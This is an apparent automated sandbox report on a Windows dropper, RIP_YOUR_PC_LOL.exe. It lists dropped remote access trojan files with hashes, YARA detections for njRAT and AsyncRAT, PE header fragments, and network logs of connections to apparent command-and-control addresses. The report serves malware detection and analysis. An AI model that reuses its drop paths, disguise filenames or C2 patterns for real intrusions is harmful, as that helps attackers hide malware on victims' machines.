                                                                                                        • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: C:\Users\user\AppData\Roaming\mediaget.exe, Author: ditekSHen
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Roaming\mediaget.exe, Author: Brian Wallace @botnet_hunter
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a................................ ........@.. ....................................@.....................................W.......@............................................................................ ............... ..H............text....... ...................... ..`.rsrc...@...........................@..@.reloc..............................@..B........................H........e...E..........................................................&.(......**..(......*.s.........s.........s.........s..........*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0.............(....(.....+..*...0............(.....+..*.0................(.....+..*.0............(.....+..*.0.. ...................,.(...+.+.+....+...*.0...........................**..(......*....0..&........~..............,.(...+.

                                                                                                        C:\Users\user\AppData\Roaming\test.exe

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\AppData\Roaming\healastounding.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):46080
                                                                                                        Entropy (8bit):5.459376005695359
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:EuwCNToEjaNLWU3zKZmo2q7C8V1vBTcPI1zjbkgX3ir64oRfdwQfybTWVABDZTx:EuwCNToqaS2z8VnTh13brXSr64oZSbZH
                                                                                                        MD5:7E50B292982932190179245C60C0B59B
                                                                                                        SHA1:25CF641DDCDC818F32837DB236A58060426B5571
                                                                                                        SHA-256:A8DDE4E60DB080DFC397D7E312E7E9F18D9C08D6088E8043FEEAE9AB32ABDBB8
                                                                                                        SHA-512:C6D422D9FB115E1B6B085285B1D3CA46ED541E390895D702710E82A336F4DE6CC5C9183F8E6EBE35475FCCE6DEF8CC5FFA8EE4A61B38D7E80A9F40789688B885
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\test.exe, Author: Joe Security
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Roaming\test.exe, Author: ditekSHen
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#..^............................N.... ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text...T.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................0.......H........Y...m.............................................................V..;...$0.xC.=VD..b......9A../.\.....(....*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.~....*.......*.~....*.......*.~....*.......**.(>......*2~.....o?...*.s.........*.()...:(...(*...:....(+...:....('...:....((...9.....(v...*V(....s.... ...o....*n~....9....~....o..........*~~....(....9....(0...9....(@...*Vr.%.p~....(o....#...*.s...

                                                                                                        C:\Windows\Cursors\WUDFhosts.exe

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\AppData\Roaming\22.exe
                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):806912
                                                                                                        Entropy (8bit):7.921653477744872
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24576:f7hffPYBJUtGpCXX3dquvU9ckRvYLpZjQaYM8l:NfLtGoDs9cXpJG
                                                                                                        MD5:4A72E30C0A582B082030ADFD8345014F
                                                                                                        SHA1:2F92CCF13F8DFC7EEFF49903A0D1EA8DD97A7353
                                                                                                        SHA-256:E1315C41F50A75C308CDB023F7E48C0AA62931D5771AD8BC4220018ED5D7F976
                                                                                                        SHA-512:8A75925B0695284105856823190531DC4CFCF32A8AE3226EF8C1F796185AA01F8C085B6457A63B1CF81842DA2C6BAAFD4CABF7565A8D96D3460054439BBFB798
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...................E[Z....E[X.D..E[Y....ogl..................b......,8`..........b...'..b......b.T......<....b......Rich...........................PE..d...5..].........."...... ...0....K...W...K....@..............................X...........`...................................................W.......W..+....U...............W.............................`.W.(.....W.............................................UPX0......K.............................UPX1..... ....K.....................@....rsrc....0....W......"..............@......................................................................................................................................................................................................................................................................................................................3.93.UPX!.$..

                                                                                                        C:\Windows\Help\Winlogon.exe

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\AppData\Roaming\22.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):76248
                                                                                                        Entropy (8bit):6.357076953831382
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:WH8tImFvh/tAoX/V1d/Xc81qsWjcdTxekxemB:WH8imz/H111TxfAmB
                                                                                                        MD5:A8DDACE9435FE395325FC45DDE8BD0A3
                                                                                                        SHA1:DCF9BAAA9E3A27450DEBF4F35112376ED005C800
                                                                                                        SHA-256:6E81D7C71B3E8D731E11AD75D3DAC02A4210C9F90FAC618AF5C00CBCE3718658
                                                                                                        SHA-512:2C6006E42ECF31DA02A4584E69C0E55390BE5A405353307582852728B2CEB65033F3F5CD0B6465B3A1541D19EAB95C61B394E3403DEE558196C2F2969D82B196
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x...<O..<O..<O..1..$O..1..3O..1..ZO..A6.?O..57..>O..<O..pO..A6..=O..1..=O..<O..=O..A6.=O..Rich<O..................PE..L...K..Y..........................................@..........................P............@.....................................<....0..`....................@..l...@...8...............................@............................................text............................... ..`.rdata..tF.......H..................@..@.data....0..........................@....rsrc...`....0......................@..@.reloc..l....@......................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                        C:\Windows\Help\active_desktop_render.dll

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\AppData\Roaming\22.exe
                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):995328
                                                                                                        Entropy (8bit):6.19848257170581
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:BT8s5nv9sQ1ViVNEPazI+eGGhFqxVOa+28WXvC:BT8MnlsQ1kVqPv+eDhGwdIvC
                                                                                                        MD5:07A36097730666FE9E5434D85A5AB989
                                                                                                        SHA1:780CA47C15932ED1F9640C17B9BB340410A52338
                                                                                                        SHA-256:1FB4CEE4D83D424E0BFCBFD97169EF717B3EBDCC5D01BA7C7C547AE606AD5C3C
                                                                                                        SHA-512:4A08080471C660856AF724E4480EC721C22C462346E293D93E2F9577E6D669C6B51CD81EF96DFAD943C791DFD7F7F0C2D5234A82D81CE5F1C01BB493CDA34085
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: MALWARE_Win_BlackMoon, Description: Detects executables using BlackMoon RunTime, Source: C:\Windows\Help\active_desktop_render.dll, Author: ditekSHen
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................. ......`............ .....................................Rich...................PE..L...Kw.]...........!.....@...........m.......P......................................................................p........y.......0.. ....................@.......................................................P..t............................text...J:.......@.................. ..`.rdata...=...P...@...P..............@..@.data............P..................@....rsrc... ....0......................@..@.reloc...3...@...@..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                        Static File Info

                                                                                                        General

                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Entropy (8bit):7.788951719729708
                                                                                                        TrID:
                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.63%
                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.58%
                                                                                                        • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.41%
                                                                                                        • InstallShield setup (43055/19) 0.21%
                                                                                                        • UPX compressed Win32 Executable (30571/9) 0.15%
                                                                                                        File name:RIP_YOUR_PC_LOL.exe
                                                                                                        File size:23633920
                                                                                                        MD5:52867174362410d63215d78e708103ea
                                                                                                        SHA1:7ae4e1048e4463a4201bdeaf224c5b6face681bf
                                                                                                        SHA256:37d8e1ce3b6e6488942717aa78cb54785edc985143bcc8d9ba9f42d73a3dbd7a
                                                                                                        SHA512:89e17e147d3f073e479e85d0b0321f6264bbc2aa84c930ed645e8f5cde3f1e58812c3db1ba0f10bee6ce7ac0731e1e3de6747a9b3c4d63a564dd8d904bd726ab
                                                                                                        SSDEEP:393216:HJLgf7BPkdKzrZciLxv8naSNtPr5rn57M84UTB9xO5/VWvJKJPkwdnfZ4y5SDkFV:poBPQwxMR7pn5qUTB9xOFVWvJKJPkwd9
                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...e..a..................h...........h.. ....h...@.. ........................i...........@................................

                                                                                                        File Icon

                                                                                                        Icon Hash:00828e8e8686b000

                                                                                                        Static PE Info

                                                                                                        General

                                                                                                        Entrypoint:0x1a8b4ae
                                                                                                        Entrypoint Section:.text
                                                                                                        Digitally signed:false
                                                                                                        Imagebase:0x400000
                                                                                                        Subsystem:windows gui
                                                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                        Time Stamp:0x61B51365 [Sat Dec 11 21:08:53 2021 UTC]
                                                                                                        TLS Callbacks:
                                                                                                        CLR (.Net) Version:v2.0.50727
                                                                                                        OS Version Major:4
                                                                                                        OS Version Minor:0
                                                                                                        File Version Major:4
                                                                                                        File Version Minor:0
                                                                                                        Subsystem Version Major:4
                                                                                                        Subsystem Version Minor:0
                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                        Entrypoint Preview

                                                                                                        Instruction
                                                                                                        jmp dword ptr [00402000h]
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al

                                                                                                        Data Directories

                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x168b4540x57.text
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x168c0000x598.rsrc
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x168e0000xc.reloc
                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                        Sections

                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                        .text0x20000x16894b40x1689600unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                        .rsrc0x168c0000x5980x600False0.421223958333data4.08611300158IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .reloc0x168e0000xc0x200False0.044921875data0.118369631259IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                        Resources

                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                        RT_VERSION0x168c0a00x304data
                                                                                                        RT_MANIFEST0x168c3a80x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                                        Imports

                                                                                                        DLLImport
                                                                                                        mscoree.dll_CorExeMain

                                                                                                        Version Infos

                                                                                                        DescriptionData
                                                                                                        Translation0x0000 0x04b0
                                                                                                        LegalCopyrightemerge brutal
                                                                                                        Assembly Version14.5.48.86
                                                                                                        InternalNamefoampounding.exe
                                                                                                        FileVersion14.5.48.86
                                                                                                        CompanyNamebrawler
                                                                                                        ProductNameopen
                                                                                                        ProductVersion14.5.48.86
                                                                                                        FileDescriptionearfalserust
                                                                                                        OriginalFilenamefoampounding.exe

                                                                                                        Network Behavior

                                                                                                        Snort IDS Alerts

                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                        03/08/22-18:01:02.530765UDP254DNS SPOOF query response with TTL of 1 min. and no authority53517488.8.8.8192.168.2.6
                                                                                                        03/08/22-18:01:29.841168UDP254DNS SPOOF query response with TTL of 1 min. and no authority53496958.8.8.8192.168.2.6
                                                                                                        03/08/22-18:01:52.276662UDP254DNS SPOOF query response with TTL of 1 min. and no authority53616078.8.8.8192.168.2.6
                                                                                                        03/08/22-18:02:29.169253UDP254DNS SPOOF query response with TTL of 1 min. and no authority53528588.8.8.8192.168.2.6
                                                                                                        03/08/22-18:02:48.436398UDP254DNS SPOOF query response with TTL of 1 min. and no authority53598718.8.8.8192.168.2.6
                                                                                                        03/08/22-18:02:48.491531UDP254DNS SPOOF query response with TTL of 1 min. and no authority53500298.8.8.8192.168.2.6
                                                                                                        03/08/22-18:02:48.738596UDP254DNS SPOOF query response with TTL of 1 min. and no authority53511948.8.8.8192.168.2.6
                                                                                                        03/08/22-18:02:53.688495UDP254DNS SPOOF query response with TTL of 1 min. and no authority53500818.8.8.8192.168.2.6
                                                                                                        03/08/22-18:02:56.227160UDP254DNS SPOOF query response with TTL of 1 min. and no authority53550838.8.8.8192.168.2.6
                                                                                                        03/08/22-18:02:58.743158UDP254DNS SPOOF query response with TTL of 1 min. and no authority53591068.8.8.8192.168.2.6
                                                                                                        03/08/22-18:03:09.787643UDP254DNS SPOOF query response with TTL of 1 min. and no authority53611528.8.8.8192.168.2.6
                                                                                                        03/08/22-18:03:11.689559UDP254DNS SPOOF query response with TTL of 1 min. and no authority53496798.8.8.8192.168.2.6
                                                                                                        03/08/22-18:03:22.042737UDP254DNS SPOOF query response with TTL of 1 min. and no authority53522258.8.8.8192.168.2.6

                                                                                                        Network Port Distribution

                                                                                                        TCP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Mar 8, 2022 18:01:02.549043894 CET497688050192.168.2.6179.13.1.253
                                                                                                        Mar 8, 2022 18:01:05.605629921 CET497688050192.168.2.6179.13.1.253
                                                                                                        Mar 8, 2022 18:01:11.606240988 CET497688050192.168.2.6179.13.1.253
                                                                                                        Mar 8, 2022 18:01:21.307589054 CET4977080192.168.2.652.20.78.240
                                                                                                        Mar 8, 2022 18:01:21.448190928 CET804977052.20.78.240192.168.2.6
                                                                                                        Mar 8, 2022 18:01:21.448342085 CET4977080192.168.2.652.20.78.240
                                                                                                        Mar 8, 2022 18:01:21.456914902 CET4977080192.168.2.652.20.78.240
                                                                                                        Mar 8, 2022 18:01:21.596329927 CET804977052.20.78.240192.168.2.6
                                                                                                        Mar 8, 2022 18:01:21.597302914 CET804977052.20.78.240192.168.2.6
                                                                                                        Mar 8, 2022 18:01:21.597403049 CET4977080192.168.2.652.20.78.240
                                                                                                        Mar 8, 2022 18:01:22.363976955 CET4977180192.168.2.680.87.192.115
                                                                                                        Mar 8, 2022 18:01:22.423902035 CET804977180.87.192.115192.168.2.6
                                                                                                        Mar 8, 2022 18:01:22.424120903 CET4977180192.168.2.680.87.192.115
                                                                                                        Mar 8, 2022 18:01:29.900438070 CET497728050192.168.2.6179.13.1.253
                                                                                                        Mar 8, 2022 18:01:32.904844999 CET497728050192.168.2.6179.13.1.253
                                                                                                        Mar 8, 2022 18:01:38.999099016 CET497728050192.168.2.6179.13.1.253
                                                                                                        Mar 8, 2022 18:01:50.012576103 CET4977358491192.168.2.6172.98.92.42
                                                                                                        Mar 8, 2022 18:01:50.126136065 CET5849149773172.98.92.42192.168.2.6
                                                                                                        Mar 8, 2022 18:01:50.812603951 CET4977358491192.168.2.6172.98.92.42
                                                                                                        Mar 8, 2022 18:01:50.926179886 CET5849149773172.98.92.42192.168.2.6
                                                                                                        Mar 8, 2022 18:01:51.429456949 CET4977358491192.168.2.6172.98.92.42
                                                                                                        Mar 8, 2022 18:01:51.544755936 CET5849149773172.98.92.42192.168.2.6
                                                                                                        Mar 8, 2022 18:01:52.529678106 CET497741470192.168.2.641.249.51.34
                                                                                                        Mar 8, 2022 18:01:55.610013008 CET497741470192.168.2.641.249.51.34
                                                                                                        Mar 8, 2022 18:01:56.268575907 CET497758050192.168.2.6179.13.1.253
                                                                                                        Mar 8, 2022 18:01:59.313349009 CET497758050192.168.2.6179.13.1.253
                                                                                                        Mar 8, 2022 18:02:01.610399961 CET497741470192.168.2.641.249.51.34
                                                                                                        Mar 8, 2022 18:02:05.313823938 CET497758050192.168.2.6179.13.1.253
                                                                                                        Mar 8, 2022 18:02:05.928004980 CET4977658491192.168.2.6172.98.92.42
                                                                                                        Mar 8, 2022 18:02:06.042727947 CET5849149776172.98.92.42192.168.2.6
                                                                                                        Mar 8, 2022 18:02:06.642051935 CET4977658491192.168.2.6172.98.92.42
                                                                                                        Mar 8, 2022 18:02:06.756652117 CET5849149776172.98.92.42192.168.2.6
                                                                                                        Mar 8, 2022 18:02:07.345288038 CET4977658491192.168.2.6172.98.92.42
                                                                                                        Mar 8, 2022 18:02:07.460087061 CET5849149776172.98.92.42192.168.2.6
                                                                                                        Mar 8, 2022 18:02:21.598696947 CET804977052.20.78.240192.168.2.6
                                                                                                        Mar 8, 2022 18:02:21.623155117 CET4977080192.168.2.652.20.78.240
                                                                                                        Mar 8, 2022 18:02:22.540772915 CET804977180.87.192.115192.168.2.6
                                                                                                        Mar 8, 2022 18:02:22.544246912 CET4977180192.168.2.680.87.192.115
                                                                                                        Mar 8, 2022 18:02:29.260555983 CET497778050192.168.2.6179.13.1.253
                                                                                                        Mar 8, 2022 18:02:32.348848104 CET497778050192.168.2.6179.13.1.253
                                                                                                        Mar 8, 2022 18:02:38.443535089 CET497778050192.168.2.6179.13.1.253
                                                                                                        Mar 8, 2022 18:02:41.668142080 CET4977858491192.168.2.6172.98.92.42
                                                                                                        Mar 8, 2022 18:02:41.783175945 CET5849149778172.98.92.42192.168.2.6
                                                                                                        Mar 8, 2022 18:02:42.302769899 CET4977858491192.168.2.6172.98.92.42
                                                                                                        Mar 8, 2022 18:02:42.417251110 CET5849149778172.98.92.42192.168.2.6
                                                                                                        Mar 8, 2022 18:02:43.115386009 CET4977858491192.168.2.6172.98.92.42
                                                                                                        Mar 8, 2022 18:02:43.230278015 CET5849149778172.98.92.42192.168.2.6
                                                                                                        Mar 8, 2022 18:02:48.515594006 CET497801470192.168.2.641.249.51.34
                                                                                                        Mar 8, 2022 18:02:51.537960052 CET497801470192.168.2.641.249.51.34
                                                                                                        Mar 8, 2022 18:02:55.695036888 CET497938050192.168.2.6179.13.1.253
                                                                                                        Mar 8, 2022 18:02:57.647829056 CET497801470192.168.2.641.249.51.34
                                                                                                        Mar 8, 2022 18:02:58.804176092 CET497938050192.168.2.6179.13.1.253
                                                                                                        Mar 8, 2022 18:03:02.885044098 CET4980458491192.168.2.6172.98.92.42
                                                                                                        Mar 8, 2022 18:03:02.999629974 CET5849149804172.98.92.42192.168.2.6
                                                                                                        Mar 8, 2022 18:03:03.617047071 CET4980458491192.168.2.6172.98.92.42
                                                                                                        Mar 8, 2022 18:03:03.731703043 CET5849149804172.98.92.42192.168.2.6
                                                                                                        Mar 8, 2022 18:03:04.304689884 CET4980458491192.168.2.6172.98.92.42
                                                                                                        Mar 8, 2022 18:03:04.419482946 CET5849149804172.98.92.42192.168.2.6
                                                                                                        Mar 8, 2022 18:03:04.804677963 CET497938050192.168.2.6179.13.1.253
                                                                                                        Mar 8, 2022 18:03:08.456417084 CET4981558491192.168.2.6172.98.92.42
                                                                                                        Mar 8, 2022 18:03:08.571064949 CET5849149815172.98.92.42192.168.2.6
                                                                                                        Mar 8, 2022 18:03:09.117554903 CET4981558491192.168.2.6172.98.92.42
                                                                                                        Mar 8, 2022 18:03:09.232285976 CET5849149815172.98.92.42192.168.2.6
                                                                                                        Mar 8, 2022 18:03:09.806243896 CET4981558491192.168.2.6172.98.92.42
                                                                                                        Mar 8, 2022 18:03:09.920924902 CET5849149815172.98.92.42192.168.2.6
                                                                                                        Mar 8, 2022 18:03:10.235430956 CET4977080192.168.2.652.20.78.240
                                                                                                        Mar 8, 2022 18:03:10.375109911 CET804977052.20.78.240192.168.2.6
                                                                                                        Mar 8, 2022 18:03:11.695297003 CET498201470192.168.2.641.249.51.34
                                                                                                        Mar 8, 2022 18:03:13.931397915 CET4982558491192.168.2.6172.98.92.42
                                                                                                        Mar 8, 2022 18:03:14.047744036 CET5849149825172.98.92.42192.168.2.6
                                                                                                        Mar 8, 2022 18:03:14.618395090 CET4982558491192.168.2.6172.98.92.42
                                                                                                        Mar 8, 2022 18:03:14.733145952 CET5849149825172.98.92.42192.168.2.6
                                                                                                        Mar 8, 2022 18:03:14.805542946 CET498201470192.168.2.641.249.51.34
                                                                                                        Mar 8, 2022 18:03:15.306822062 CET4982558491192.168.2.6172.98.92.42
                                                                                                        Mar 8, 2022 18:03:15.421253920 CET5849149825172.98.92.42192.168.2.6
                                                                                                        Mar 8, 2022 18:03:20.806010008 CET498201470192.168.2.641.249.51.34
                                                                                                        Mar 8, 2022 18:03:22.143265009 CET498388050192.168.2.6179.13.1.253

                                                                                                        UDP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Mar 8, 2022 18:00:25.222332954 CET5659153192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:01:02.421529055 CET5174853192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:01:02.530765057 CET53517488.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:01:21.131813049 CET5095853192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:01:21.159094095 CET53509588.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:01:29.731457949 CET4969553192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:01:29.841167927 CET53496958.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:01:52.253196955 CET6160753192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:01:52.276662111 CET53616078.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:01:56.196608067 CET5655053192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:01:56.216669083 CET53565508.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:02:29.062084913 CET5285853192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:02:29.169253111 CET53528588.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:02:48.149482012 CET5002953192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:02:48.414717913 CET5987153192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:02:48.427118063 CET5119453192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:02:48.436398029 CET53598718.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:02:48.491530895 CET53500298.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:02:48.514926910 CET5166653192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:02:48.538808107 CET53516668.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:02:48.738595963 CET53511948.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:02:49.711517096 CET5703753192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:02:49.731496096 CET53570378.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:02:50.793032885 CET6060953192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:02:50.815732956 CET53606098.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:02:50.939651012 CET5452953192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:02:50.959239960 CET53545298.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:02:51.056174994 CET6264353192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:02:51.073822021 CET53626438.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:02:52.364578009 CET5401553192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:02:52.455807924 CET53540158.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:02:52.476210117 CET5208953192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:02:52.546967030 CET53520898.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:02:52.577049971 CET5448953192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:02:52.664900064 CET53544898.8.8.8192.168.2.6
